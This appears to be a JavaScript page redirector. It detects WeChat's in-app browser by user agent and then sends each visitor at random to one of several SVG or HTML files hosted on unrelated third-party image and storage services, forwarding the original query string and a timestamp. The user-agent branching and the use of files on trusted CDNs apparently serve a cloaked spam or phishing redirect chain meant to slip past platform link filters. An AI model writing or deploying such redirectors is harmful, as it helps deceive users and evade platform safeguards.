	const searchParams = new URLSearchParams(window.location.search);
	let u;
	if (searchParams.has('u')) {
	  u = searchParams.get('u');
	} else {
	  u = window.location.search.substring(1);
	}
	
	function getQueryParam(param) {
	  var urlParams = new URLSearchParams(window.location.search);
	  return urlParams.get(param);
	}
	
	var isWeChat = /micromessenger/i.test(navigator.userAgent.toLowerCase());
	var redirectURL;
	
	if (isWeChat) {
	  var randomIndex = Math.floor(Math.random() * 2); 
	  if (randomIndex === 0) {
	    redirectURL = "https://pic6.58cdn.com.cn/nowater/gjImageFile/n_v3d8c5a4720251423496c5a1f56b3029a3.svg?" + u;
	  } else {
	    redirectURL = "https://image.cls.cn/cailianpress/avatar/20230525/cailianpress051540405.svg?" + u;
	  }
	} else {
	  var randomIndex = Math.floor(Math.random() * 2);
	  if (randomIndex === 0) {
	    redirectURL = "https://yun-src.leju.com/31-2-AdRcEQ33zOli5QDNK7untXcQN6sB0u2NK7gXVCtvEGka61RMkbYyhXwu8wRfUgeA28L1JB1gGFE7rCv2.html?" + u;
	  } else {
	    redirectURL = "https://todesk-user-pic.oss-cn-guangzhou.aliyuncs.com/202306022125525fd257df755ee0.svg?" + u;
	  }
	}
	
	var paramValue = getQueryParam("_t");
	if (paramValue) {
	  redirectURL += "&_t=" + paramValue;
	} else {
	  redirectURL += "&_t=" + Date.now();
	}
	window.location.replace(redirectURL);